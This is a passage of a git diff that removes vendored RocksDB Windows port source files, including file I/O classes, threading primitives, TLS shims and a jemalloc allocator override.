-size_t WinRandomRWFile::GetRequiredBufferAlignment() const {
-  return GetAlignement();
-}
-
-Status WinRandomRWFile::Write(uint64_t offset, const Slice & data) {
-  return PositionedAppendImpl(data, offset);
-}
-
-Status WinRandomRWFile::Read(uint64_t offset, size_t n, Slice* result,
-                             char* scratch) const {
-  return ReadImpl(offset, n, result, scratch);
-}
-
-Status WinRandomRWFile::Flush() {
-  return Status::OK();
-}
-
-Status WinRandomRWFile::Sync() {
-  return SyncImpl();
-}
-
-Status WinRandomRWFile::Close() {
-  return CloseImpl();
-}
-
-//////////////////////////////////////////////////////////////////////////
-/// WinDirectory
-
-Status WinDirectory::Fsync() { return Status::OK(); }
-
-//////////////////////////////////////////////////////////////////////////
-/// WinFileLock
-
-WinFileLock::~WinFileLock() {
-  BOOL ret = ::CloseHandle(hFile_);
-  assert(ret);
-}
-
-}
-}
diff --git a/thirdparty/rocksdb/port/win/io_win.h b/thirdparty/rocksdb/port/win/io_win.h
deleted file mode 100644
index 2c1d5a1..0000000
--- a/thirdparty/rocksdb/port/win/io_win.h
+++ /dev/null
@@ -1,441 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <stdint.h>
-#include <mutex>
-#include <string>
-
-#include "rocksdb/status.h"
-#include "rocksdb/env.h"
-#include "util/aligned_buffer.h"
-
-#include <windows.h>
-
-
-namespace rocksdb {
-namespace port {
-
-std::string GetWindowsErrSz(DWORD err);
-
-inline Status IOErrorFromWindowsError(const std::string& context, DWORD err) {
-  return ((err == ERROR_HANDLE_DISK_FULL) || (err == ERROR_DISK_FULL))
-             ? Status::NoSpace(context, GetWindowsErrSz(err))
-             : Status::IOError(context, GetWindowsErrSz(err));
-}
-
-inline Status IOErrorFromLastWindowsError(const std::string& context) {
-  return IOErrorFromWindowsError(context, GetLastError());
-}
-
-inline Status IOError(const std::string& context, int err_number) {
-  return (err_number == ENOSPC)
-             ? Status::NoSpace(context, strerror(err_number))
-             : Status::IOError(context, strerror(err_number));
-}
-
-// Note the below two do not set errno because they are used only here in this
-// file
-// on a Windows handle and, therefore, not necessary. Translating GetLastError()
-// to errno
-// is a sad business
-inline int fsync(HANDLE hFile) {
-  if (!FlushFileBuffers(hFile)) {
-    return -1;
-  }
-
-  return 0;
-}
-
-SSIZE_T pwrite(HANDLE hFile, const char* src, size_t numBytes, uint64_t offset);
-
-SSIZE_T pread(HANDLE hFile, char* src, size_t numBytes, uint64_t offset);
-
-Status fallocate(const std::string& filename, HANDLE hFile, uint64_t to_size);
-
-Status ftruncate(const std::string& filename, HANDLE hFile, uint64_t toSize);
-
-size_t GetUniqueIdFromFile(HANDLE hFile, char* id, size_t max_size);
-
-class WinFileData {
- protected:
-  const std::string filename_;
-  HANDLE hFile_;
-  // If ture,  the I/O issued would be direct I/O which the buffer
-  // will need to be aligned (not sure there is a guarantee that the buffer
-  // passed in is aligned).
-  const bool use_direct_io_;
-
- public:
-  // We want this class be usable both for inheritance (prive
-  // or protected) and for containment so __ctor and __dtor public
-  WinFileData(const std::string& filename, HANDLE hFile, bool direct_io)
-      : filename_(filename), hFile_(hFile), use_direct_io_(direct_io) {}
-
-  virtual ~WinFileData() { this->CloseFile(); }
-
-  bool CloseFile() {
-    bool result = true;
-
-    if (hFile_ != NULL && hFile_ != INVALID_HANDLE_VALUE) {
-      result = ::CloseHandle(hFile_);
-      assert(result);
-      hFile_ = NULL;
-    }
-    return result;
-  }
-
-  const std::string& GetName() const { return filename_; }
-
-  HANDLE GetFileHandle() const { return hFile_; }
-
-  bool use_direct_io() const { return use_direct_io_; }
-
-  WinFileData(const WinFileData&) = delete;
-  WinFileData& operator=(const WinFileData&) = delete;
-};
-
-class WinSequentialFile : protected WinFileData, public SequentialFile {
-
-  // Override for behavior change when creating a custom env
-  virtual SSIZE_T PositionedReadInternal(char* src, size_t numBytes,
-    uint64_t offset) const;
-
-public:
-  WinSequentialFile(const std::string& fname, HANDLE f,
-    const EnvOptions& options);
-
-  ~WinSequentialFile();
-
-  WinSequentialFile(const WinSequentialFile&) = delete;
-  WinSequentialFile& operator=(const WinSequentialFile&) = delete;
-
-  virtual Status Read(size_t n, Slice* result, char* scratch) override;
-  virtual Status PositionedRead(uint64_t offset, size_t n, Slice* result,
-    char* scratch) override;
-
-  virtual Status Skip(uint64_t n) override;
-
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-
-  virtual bool use_direct_io() const override { return WinFileData::use_direct_io(); }
-};
-
-// mmap() based random-access
-class WinMmapReadableFile : private WinFileData, public RandomAccessFile {
-  HANDLE hMap_;
-
-  const void* mapped_region_;
-  const size_t length_;
-
- public:
-  // mapped_region_[0,length-1] contains the mmapped contents of the file.
-  WinMmapReadableFile(const std::string& fileName, HANDLE hFile, HANDLE hMap,
-                      const void* mapped_region, size_t length);
-
-  ~WinMmapReadableFile();
-
-  WinMmapReadableFile(const WinMmapReadableFile&) = delete;
-  WinMmapReadableFile& operator=(const WinMmapReadableFile&) = delete;
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override;
-
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override;
-};
-
-// We preallocate and use memcpy to append new
-// data to the file.  This is safe since we either properly close the
-// file before reading from it, or for log files, the reading code
-// knows enough to skip zero suffixes.
-class WinMmapFile : private WinFileData, public WritableFile {
- private:
-  HANDLE hMap_;
-
-  const size_t page_size_;  // We flush the mapping view in page_size
-  // increments. We may decide if this is a memory
-  // page size or SSD page size
-  const size_t
-      allocation_granularity_;  // View must start at such a granularity
-
-  size_t reserved_size_;  // Preallocated size
-
-  size_t mapping_size_;  // The max size of the mapping object
-  // we want to guess the final file size to minimize the remapping
-  size_t view_size_;  // How much memory to map into a view at a time
-
-  char* mapped_begin_;  // Must begin at the file offset that is aligned with
-  // allocation_granularity_
-  char* mapped_end_;
-  char* dst_;  // Where to write next  (in range [mapped_begin_,mapped_end_])
-  char* last_sync_;  // Where have we synced up to
-
-  uint64_t file_offset_;  // Offset of mapped_begin_ in file
-
-  // Do we have unsynced writes?
-  bool pending_sync_;
-
-  // Can only truncate or reserve to a sector size aligned if
-  // used on files that are opened with Unbuffered I/O
-  Status TruncateFile(uint64_t toSize);
-
-  Status UnmapCurrentRegion();
-
-  Status MapNewRegion();
-
-  virtual Status PreallocateInternal(uint64_t spaceToReserve);
-
- public:
-  WinMmapFile(const std::string& fname, HANDLE hFile, size_t page_size,
-              size_t allocation_granularity, const EnvOptions& options);
-
-  ~WinMmapFile();
-
-  WinMmapFile(const WinMmapFile&) = delete;
-  WinMmapFile& operator=(const WinMmapFile&) = delete;
-
-  virtual Status Append(const Slice& data) override;
-
-  // Means Close() will properly take care of truncate
-  // and it does not need any additional information
-  virtual Status Truncate(uint64_t size) override;
-
-  virtual Status Close() override;
-
-  virtual Status Flush() override;
-
-  // Flush only data
-  virtual Status Sync() override;
-
-  /**
-  * Flush data as well as metadata to stable storage.
-  */
-  virtual Status Fsync() override;
-
-  /**
-  * Get the size of valid data in the file. This will not match the
-  * size that is returned from the filesystem because we use mmap
-  * to extend file by map_size every time.
-  */
-  virtual uint64_t GetFileSize() override;
-
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-
-  virtual Status Allocate(uint64_t offset, uint64_t len) override;
-
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override;
-};
-
-class WinRandomAccessImpl {
- protected:
-  WinFileData* file_base_;
-  size_t       alignment_;
-
-  // Override for behavior change when creating a custom env
-  virtual SSIZE_T PositionedReadInternal(char* src, size_t numBytes,
-                                         uint64_t offset) const;
-
-  WinRandomAccessImpl(WinFileData* file_base, size_t alignment,
-                      const EnvOptions& options);
-
-  virtual ~WinRandomAccessImpl() {}
-
-  Status ReadImpl(uint64_t offset, size_t n, Slice* result,
-                  char* scratch) const;
-
-  size_t GetAlignment() const { return alignment_; }
-
- public:
-
-  WinRandomAccessImpl(const WinRandomAccessImpl&) = delete;
-  WinRandomAccessImpl& operator=(const WinRandomAccessImpl&) = delete;
-};
-
-// pread() based random-access
-class WinRandomAccessFile
-    : private WinFileData,
-      protected WinRandomAccessImpl,  // Want to be able to override
-                                      // PositionedReadInternal
-      public RandomAccessFile {
- public:
-  WinRandomAccessFile(const std::string& fname, HANDLE hFile, size_t alignment,
-                      const EnvOptions& options);
-
-  ~WinRandomAccessFile();
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override;
-
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override;
-
-  virtual bool use_direct_io() const override { return WinFileData::use_direct_io(); }
-
-  virtual Status InvalidateCache(size_t offset, size_t length) override;
-
-  virtual size_t GetRequiredBufferAlignment() const override;
-};
-
-// This is a sequential write class. It has been mimicked (as others) after
-// the original Posix class. We add support for unbuffered I/O on windows as
-// well
-// we utilize the original buffer as an alignment buffer to write directly to
-// file with no buffering.
-// No buffering requires that the provided buffer is aligned to the physical
-// sector size (SSD page size) and
-// that all SetFilePointer() operations to occur with such an alignment.
-// We thus always write in sector/page size increments to the drive and leave
-// the tail for the next write OR for Close() at which point we pad with zeros.
-// No padding is required for
-// buffered access.
-class WinWritableImpl {
- protected:
-  WinFileData* file_data_;
-  const uint64_t alignment_;
-  uint64_t next_write_offset_; // Needed because Windows does not support O_APPEND
-  uint64_t reservedsize_;  // how far we have reserved space
-
-  virtual Status PreallocateInternal(uint64_t spaceToReserve);
-
-  WinWritableImpl(WinFileData* file_data, size_t alignment);
-
-  ~WinWritableImpl() {}
-
-  uint64_t GetAlignement() const { return alignment_; }
-
-  Status AppendImpl(const Slice& data);
-
-  // Requires that the data is aligned as specified by
-  // GetRequiredBufferAlignment()
-  Status PositionedAppendImpl(const Slice& data, uint64_t offset);
-
-  Status TruncateImpl(uint64_t size);
-
-  Status CloseImpl();
-
-  Status SyncImpl();
-
-  uint64_t GetFileNextWriteOffset() {
-    // Double accounting now here with WritableFileWriter
-    // and this size will be wrong when unbuffered access is used
-    // but tests implement their own writable files and do not use
-    // WritableFileWrapper
-    // so we need to squeeze a square peg through
-    // a round hole here.
-    return next_write_offset_;
-  }
-
-  Status AllocateImpl(uint64_t offset, uint64_t len);
-
- public:
-  WinWritableImpl(const WinWritableImpl&) = delete;
-  WinWritableImpl& operator=(const WinWritableImpl&) = delete;
-};
-
-class WinWritableFile : private WinFileData,
-                        protected WinWritableImpl,
-                        public WritableFile {
- public:
-  WinWritableFile(const std::string& fname, HANDLE hFile, size_t alignment,
-                  size_t capacity, const EnvOptions& options);
-
-  ~WinWritableFile();
-
-  virtual Status Append(const Slice& data) override;
-
-  // Requires that the data is aligned as specified by
-  // GetRequiredBufferAlignment()
-  virtual Status PositionedAppend(const Slice& data, uint64_t offset) override;
-
-  // Need to implement this so the file is truncated correctly
-  // when buffered and unbuffered mode
-  virtual Status Truncate(uint64_t size) override;
-
-  virtual Status Close() override;
-
-  // write out the cached data to the OS cache
-  // This is now taken care of the WritableFileWriter
-  virtual Status Flush() override;
-
-  virtual Status Sync() override;
-
-  virtual Status Fsync() override;
-
-  // Indicates if the class makes use of direct I/O
-  // Use PositionedAppend
-  virtual bool use_direct_io() const override;
-
-  virtual size_t GetRequiredBufferAlignment() const override;
-
-  virtual uint64_t GetFileSize() override;
-
-  virtual Status Allocate(uint64_t offset, uint64_t len) override;
-
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override;
-};
-
-class WinRandomRWFile : private WinFileData,
-                        protected WinRandomAccessImpl,
-                        protected WinWritableImpl,
-                        public RandomRWFile {
- public:
-  WinRandomRWFile(const std::string& fname, HANDLE hFile, size_t alignment,
-                  const EnvOptions& options);
-
-  ~WinRandomRWFile() {}
-
-  // Indicates if the class makes use of direct I/O
-  // If false you must pass aligned buffer to Write()
-  virtual bool use_direct_io() const override;
-
-  // Use the returned alignment value to allocate aligned
-  // buffer for Write() when use_direct_io() returns true
-  virtual size_t GetRequiredBufferAlignment() const override;
-
-  // Write bytes in `data` at  offset `offset`, Returns Status::OK() on success.
-  // Pass aligned buffer when use_direct_io() returns true.
-  virtual Status Write(uint64_t offset, const Slice& data) override;
-
-  // Read up to `n` bytes starting from offset `offset` and store them in
-  // result, provided `scratch` size should be at least `n`.
-  // Returns Status::OK() on success.
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override;
-
-  virtual Status Flush() override;
-
-  virtual Status Sync() override;
-
-  virtual Status Fsync() { return Sync(); }
-
-  virtual Status Close() override;
-};
-
-class WinDirectory : public Directory {
- public:
-  WinDirectory() {}
-
-  virtual Status Fsync() override;
-};
-
-class WinFileLock : public FileLock {
- public:
-  explicit WinFileLock(HANDLE hFile) : hFile_(hFile) {
-    assert(hFile != NULL);
-    assert(hFile != INVALID_HANDLE_VALUE);
-  }
-
-  ~WinFileLock();
-
- private:
-  HANDLE hFile_;
-};
-}
-}
diff --git a/thirdparty/rocksdb/port/win/port_win.cc b/thirdparty/rocksdb/port/win/port_win.cc
deleted file mode 100644
index b3fccbd..0000000
--- a/thirdparty/rocksdb/port/win/port_win.cc
+++ /dev/null
@@ -1,230 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#if !defined(OS_WIN) && !defined(WIN32) && !defined(_WIN32)
-#error Windows Specific Code
-#endif
-
-#include "port/win/port_win.h"
-
-#include <io.h>
-#include "port/dirent.h"
-#include "port/sys_time.h"
-
-#include <cstdlib>
-#include <stdio.h>
-#include <assert.h>
-#include <string.h>
-
-#include <memory>
-#include <exception>
-#include <chrono>
-
-#include "util/logging.h"
-
-namespace rocksdb {
-namespace port {
-
-void gettimeofday(struct timeval* tv, struct timezone* /* tz */) {
-  using namespace std::chrono;
-
-  microseconds usNow(
-      duration_cast<microseconds>(system_clock::now().time_since_epoch()));
-
-  seconds secNow(duration_cast<seconds>(usNow));
-
-  tv->tv_sec = static_cast<long>(secNow.count());
-  tv->tv_usec = static_cast<long>(usNow.count() -
-      duration_cast<microseconds>(secNow).count());
-}
-
-Mutex::~Mutex() {}
-
-CondVar::~CondVar() {}
-
-void CondVar::Wait() {
-  // Caller must ensure that mutex is held prior to calling this method
-  std::unique_lock<std::mutex> lk(mu_->getLock(), std::adopt_lock);
-#ifndef NDEBUG
-  mu_->locked_ = false;
-#endif
-  cv_.wait(lk);
-#ifndef NDEBUG
-  mu_->locked_ = true;
-#endif
-  // Release ownership of the lock as we don't want it to be unlocked when
-  // it goes out of scope (as we adopted the lock and didn't lock it ourselves)
-  lk.release();
-}
-
-bool CondVar::TimedWait(uint64_t abs_time_us) {
-
-  using namespace std::chrono;
-
-  // MSVC++ library implements wait_until in terms of wait_for so
-  // we need to convert absolute wait into relative wait.
-  microseconds usAbsTime(abs_time_us);
-
-  microseconds usNow(
-    duration_cast<microseconds>(system_clock::now().time_since_epoch()));
-  microseconds relTimeUs =
-    (usAbsTime > usNow) ? (usAbsTime - usNow) : microseconds::zero();
-
-  // Caller must ensure that mutex is held prior to calling this method
-  std::unique_lock<std::mutex> lk(mu_->getLock(), std::adopt_lock);
-#ifndef NDEBUG
-  mu_->locked_ = false;
-#endif
-  std::cv_status cvStatus = cv_.wait_for(lk, relTimeUs);
-#ifndef NDEBUG
-  mu_->locked_ = true;
-#endif
-  // Release ownership of the lock as we don't want it to be unlocked when
-  // it goes out of scope (as we adopted the lock and didn't lock it ourselves)
-  lk.release();
-
-  if (cvStatus == std::cv_status::timeout) {
-    return true;
-  }
-
-  return false;
-}
-
-void CondVar::Signal() { cv_.notify_one(); }
-
-void CondVar::SignalAll() { cv_.notify_all(); }
-
-int PhysicalCoreID() { return GetCurrentProcessorNumber(); }
-
-void InitOnce(OnceType* once, void (*initializer)()) {
-  std::call_once(once->flag_, initializer);
-}
-
-// Private structure, exposed only by pointer
-struct DIR {
-  intptr_t handle_;
-  bool firstread_;
-  struct __finddata64_t data_;
-  dirent entry_;
-
-  DIR() : handle_(-1), firstread_(true) {}
-
-  DIR(const DIR&) = delete;
-  DIR& operator=(const DIR&) = delete;
-
-  ~DIR() {
-    if (-1 != handle_) {
-      _findclose(handle_);
-    }
-  }
-};
-
-DIR* opendir(const char* name) {
-  if (!name || *name == 0) {
-    errno = ENOENT;
-    return nullptr;
-  }
-
-  std::string pattern(name);
-  pattern.append("\\").append("*");
-
-  std::unique_ptr<DIR> dir(new DIR);
-
-  dir->handle_ = _findfirst64(pattern.c_str(), &dir->data_);
-
-  if (dir->handle_ == -1) {
-    return nullptr;
-  }
-
-  strcpy_s(dir->entry_.d_name, sizeof(dir->entry_.d_name), dir->data_.name);
-
-  return dir.release();
-}
-
-struct dirent* readdir(DIR* dirp) {
-  if (!dirp || dirp->handle_ == -1) {
-    errno = EBADF;
-    return nullptr;
-  }
-
-  if (dirp->firstread_) {
-    dirp->firstread_ = false;
-    return &dirp->entry_;
-  }
-
-  auto ret = _findnext64(dirp->handle_, &dirp->data_);
-
-  if (ret != 0) {
-    return nullptr;
-  }
-
-  strcpy_s(dirp->entry_.d_name, sizeof(dirp->entry_.d_name), dirp->data_.name);
-
-  return &dirp->entry_;
-}
-
-int closedir(DIR* dirp) {
-  delete dirp;
-  return 0;
-}
-
-int truncate(const char* path, int64_t len) {
-  if (path == nullptr) {
-    errno = EFAULT;
-    return -1;
-  }
-
-  if (len < 0) {
-    errno = EINVAL;
-    return -1;
-  }
-
-  HANDLE hFile =
-      CreateFile(path, GENERIC_READ | GENERIC_WRITE,
-                 FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
-                 NULL,           // Security attrs
-                 OPEN_EXISTING,  // Truncate existing file only
-                 FILE_ATTRIBUTE_NORMAL, NULL);
-
-  if (INVALID_HANDLE_VALUE == hFile) {
-    auto lastError = GetLastError();
-    if (lastError == ERROR_FILE_NOT_FOUND) {
-      errno = ENOENT;
-    } else if (lastError == ERROR_ACCESS_DENIED) {
-      errno = EACCES;
-    } else {
-      errno = EIO;
-    }
-    return -1;
-  }
-
-  int result = 0;
-  FILE_END_OF_FILE_INFO end_of_file;
-  end_of_file.EndOfFile.QuadPart = len;
-
-  if (!SetFileInformationByHandle(hFile, FileEndOfFileInfo, &end_of_file,
-                                  sizeof(FILE_END_OF_FILE_INFO))) {
-    errno = EIO;
-    result = -1;
-  }
-
-  CloseHandle(hFile);
-  return result;
-}
-
-void Crash(const std::string& srcfile, int srcline) {
-  fprintf(stdout, "Crashing at %s:%d\n", srcfile.c_str(), srcline);
-  fflush(stdout);
-  abort();
-}
-
-int GetMaxOpenFiles() { return -1; }
-
-}  // namespace port
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/win/port_win.h b/thirdparty/rocksdb/port/win/port_win.h
deleted file mode 100644
index f3c8669..0000000
--- a/thirdparty/rocksdb/port/win/port_win.h
+++ /dev/null
@@ -1,347 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// See port_example.h for documentation for the following types/functions.
-
-#ifndef STORAGE_LEVELDB_PORT_PORT_WIN_H_
-#define STORAGE_LEVELDB_PORT_PORT_WIN_H_
-
-// Always want minimum headers
-#ifndef WIN32_LEAN_AND_MEAN
-#define WIN32_LEAN_AND_MEAN
-#endif
-
-// Assume that for everywhere
-#undef PLATFORM_IS_LITTLE_ENDIAN
-#define PLATFORM_IS_LITTLE_ENDIAN true
-
-#include <windows.h>
-#include <string>
-#include <string.h>
-#include <mutex>
-#include <limits>
-#include <condition_variable>
-#include <malloc.h>
-
-#include <stdint.h>
-
-#include "port/win/win_thread.h"
-
-#include "rocksdb/options.h"
-
-#undef min
-#undef max
-#undef DeleteFile
-#undef GetCurrentTime
-
-
-#ifndef strcasecmp
-#define strcasecmp _stricmp
-#endif
-
-#undef GetCurrentTime
-#undef DeleteFile
-
-#ifndef _SSIZE_T_DEFINED
-typedef SSIZE_T ssize_t;
-#endif
-
-// size_t printf formatting named in the manner of C99 standard formatting
-// strings such as PRIu64
-// in fact, we could use that one
-#ifndef ROCKSDB_PRIszt
-#define ROCKSDB_PRIszt "Iu"
-#endif
-
-#ifdef _MSC_VER
-#define __attribute__(A)
-
-// Thread local storage on Linux
-// There is thread_local in C++11
-#ifndef __thread
-#define __thread __declspec(thread)
-#endif
-
-#endif
-
-#ifndef PLATFORM_IS_LITTLE_ENDIAN
-#define PLATFORM_IS_LITTLE_ENDIAN (__BYTE_ORDER == __LITTLE_ENDIAN)
-#endif
-
-namespace rocksdb {
-
-#define PREFETCH(addr, rw, locality)
-
-namespace port {
-
-// VS 15
-#if (defined _MSC_VER) && (_MSC_VER >= 1900)
-
-#define ROCKSDB_NOEXCEPT noexcept
-
-// For use at db/file_indexer.h kLevelMaxIndex
-const int kMaxInt32 = std::numeric_limits<int>::max();
-const uint64_t kMaxUint64 = std::numeric_limits<uint64_t>::max();
-const int64_t kMaxInt64 = std::numeric_limits<int64_t>::max();
-
-const size_t kMaxSizet = std::numeric_limits<size_t>::max();
-
-#else //_MSC_VER
-
-// VS 15 has snprintf
-#define snprintf _snprintf
-
-#define ROCKSDB_NOEXCEPT
-// std::numeric_limits<size_t>::max() is not constexpr just yet
-// therefore, use the same limits
-
-// For use at db/file_indexer.h kLevelMaxIndex
-const int kMaxInt32 = INT32_MAX;
-const int64_t kMaxInt64 = INT64_MAX;
-const uint64_t kMaxUint64 = UINT64_MAX;
-
-#ifdef _WIN64
-const size_t kMaxSizet = UINT64_MAX;
-#else
-const size_t kMaxSizet = UINT_MAX;
-#endif
-
-#endif //_MSC_VER
-
-const bool kLittleEndian = true;
-
-class CondVar;
-
-class Mutex {
- public:
-
-   /* implicit */ Mutex(bool adaptive = false)
-#ifndef NDEBUG
-     : locked_(false)
-#endif
-   { }
-
-  ~Mutex();
-
-  void Lock() {
-    mutex_.lock();
-#ifndef NDEBUG
-    locked_ = true;
-#endif
-  }
-
-  void Unlock() {
-#ifndef NDEBUG
-    locked_ = false;
-#endif
-    mutex_.unlock();
-  }
-
-  // this will assert if the mutex is not locked
-  // it does NOT verify that mutex is held by a calling thread
-  void AssertHeld() {
-#ifndef NDEBUG
-    assert(locked_);
-#endif
-  }
-
-  // Mutex is move only with lock ownership transfer
-  Mutex(const Mutex&) = delete;
-  void operator=(const Mutex&) = delete;
-
- private:
-
-  friend class CondVar;
-
-  std::mutex& getLock() {
-    return mutex_;
-  }
-
-  std::mutex mutex_;
-#ifndef NDEBUG
-  bool locked_;
-#endif
-};
-
-class RWMutex {
- public:
-  RWMutex() { InitializeSRWLock(&srwLock_); }
-
-  void ReadLock() { AcquireSRWLockShared(&srwLock_); }
-
-  void WriteLock() { AcquireSRWLockExclusive(&srwLock_); }
-
-  void ReadUnlock() { ReleaseSRWLockShared(&srwLock_); }
-
-  void WriteUnlock() { ReleaseSRWLockExclusive(&srwLock_); }
-
-  // Empty as in POSIX
-  void AssertHeld() {}
-
- private:
-  SRWLOCK srwLock_;
-  // No copying allowed
-  RWMutex(const RWMutex&);
-  void operator=(const RWMutex&);
-};
-
-class CondVar {
- public:
-  explicit CondVar(Mutex* mu) : mu_(mu) {
-  }
-
-  ~CondVar();
-  void Wait();
-  bool TimedWait(uint64_t expiration_time);
-  void Signal();
-  void SignalAll();
-
-  // Condition var is not copy/move constructible
-  CondVar(const CondVar&) = delete;
-  CondVar& operator=(const CondVar&) = delete;
-
-  CondVar(CondVar&&) = delete;
-  CondVar& operator=(CondVar&&) = delete;
-
- private:
-  std::condition_variable cv_;
-  Mutex* mu_;
-};
-
-// Wrapper around the platform efficient
-// or otherwise preferrable implementation
-using Thread = WindowsThread;
-
-// OnceInit type helps emulate
-// Posix semantics with initialization
-// adopted in the project
-struct OnceType {
-
-    struct Init {};
-
-    OnceType() {}
-    OnceType(const Init&) {}
-    OnceType(const OnceType&) = delete;
-    OnceType& operator=(const OnceType&) = delete;
-
-    std::once_flag flag_;
-};
-
-#define LEVELDB_ONCE_INIT port::OnceType::Init()
-extern void InitOnce(OnceType* once, void (*initializer)());
-
-#ifndef CACHE_LINE_SIZE
-#define CACHE_LINE_SIZE 64U
-#endif
-
-#ifdef ROCKSDB_JEMALLOC
-#include "jemalloc/jemalloc.h"
-// Separate inlines so they can be replaced if needed
-inline void* jemalloc_aligned_alloc( size_t size, size_t alignment) {
-  return je_aligned_alloc(alignment, size);
-}
-inline void jemalloc_aligned_free(void* p) {
-  je_free(p);
-}
-#endif
-
-inline void *cacheline_aligned_alloc(size_t size) {
-#ifdef ROCKSDB_JEMALLOC
-  return jemalloc_aligned_alloc(size, CACHE_LINE_SIZE);
-#else
-  return _aligned_malloc(size, CACHE_LINE_SIZE);
-#endif
-}
-
-inline void cacheline_aligned_free(void *memblock) {
-#ifdef ROCKSDB_JEMALLOC
-  jemalloc_aligned_free(memblock);
-#else
-  _aligned_free(memblock);
-#endif
-}
-
-// https://gcc.gnu.org/bugzilla/show_bug.cgi?id=52991 for MINGW32
-// could not be worked around with by -mno-ms-bitfields
-#ifndef __MINGW32__
-#define ALIGN_AS(n) __declspec(align(n))
-#else
-#define ALIGN_AS(n)
-#endif
-
-static inline void AsmVolatilePause() {
-#if defined(_M_IX86) || defined(_M_X64)
-  YieldProcessor();
-#endif
-  // it would be nice to get "wfe" on ARM here
-}
-
-extern int PhysicalCoreID();
-
-// For Thread Local Storage abstraction
-typedef DWORD pthread_key_t;
-
-inline int pthread_key_create(pthread_key_t* key, void (*destructor)(void*)) {
-  // Not used
-  (void)destructor;
-
-  pthread_key_t k = TlsAlloc();
-  if (TLS_OUT_OF_INDEXES == k) {
-    return ENOMEM;
-  }
-
-  *key = k;
-  return 0;
-}
-
-inline int pthread_key_delete(pthread_key_t key) {
-  if (!TlsFree(key)) {
-    return EINVAL;
-  }
-  return 0;
-}
-
-inline int pthread_setspecific(pthread_key_t key, const void* value) {
-  if (!TlsSetValue(key, const_cast<void*>(value))) {
-    return ENOMEM;
-  }
-  return 0;
-}
-
-inline void* pthread_getspecific(pthread_key_t key) {
-  void* result = TlsGetValue(key);
-  if (!result) {
-    if (GetLastError() != ERROR_SUCCESS) {
-      errno = EINVAL;
-    } else {
-      errno = NOERROR;
-    }
-  }
-  return result;
-}
-
-// UNIX equiv although errno numbers will be off
-// using C-runtime to implement. Note, this does not
-// feel space with zeros in case the file is extended.
-int truncate(const char* path, int64_t length);
-void Crash(const std::string& srcfile, int srcline);
-extern int GetMaxOpenFiles();
-
-}  // namespace port
-
-using port::pthread_key_t;
-using port::pthread_key_create;
-using port::pthread_key_delete;
-using port::pthread_setspecific;
-using port::pthread_getspecific;
-using port::truncate;
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_LEVELDB_PORT_PORT_WIN_H_
diff --git a/thirdparty/rocksdb/port/win/win_jemalloc.cc b/thirdparty/rocksdb/port/win/win_jemalloc.cc
deleted file mode 100644
index fc46e18..0000000
--- a/thirdparty/rocksdb/port/win/win_jemalloc.cc
+++ /dev/null
@@ -1,47 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under the BSD-style license found in the
-//  LICENSE file in the root directory of this source tree. An additional grant
-//  of patent rights can be found in the PATENTS file in the same directory.
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_JEMALLOC
-# error This file can only be part of jemalloc aware build
-#endif
-
-#include <stdexcept>
-#include "jemalloc/jemalloc.h"
-
-// Global operators to be replaced by a linker when this file is
-// a part of the build
-
-void* operator new(size_t size) {
-  void* p = je_malloc(size);
-  if (!p) {
-    throw std::bad_alloc();
-  }
-  return p;
-}
-
-void* operator new[](size_t size) {
-  void* p = je_malloc(size);
-  if (!p) {
-    throw std::bad_alloc();
-  }
-  return p;
-}
-
-void operator delete(void* p) {
-  if (p) {
-    je_free(p);
-  }
-}
-
-void operator delete[](void* p) {
-  if (p) {
-    je_free(p);
-  }
-}
-
diff --git a/thirdparty/rocksdb/port/win/win_logger.cc b/thirdparty/rocksdb/port/win/win_logger.cc
deleted file mode 100644
index 0bace9f..0000000
--- a/thirdparty/rocksdb/port/win/win_logger.cc
+++ /dev/null
@@ -1,160 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Logger implementation that can be shared by all environments
-// where enough posix functionality is available.
-
-#include "port/win/win_logger.h"
-#include "port/win/io_win.h"
-
-#include <algorithm>
-#include <stdio.h>
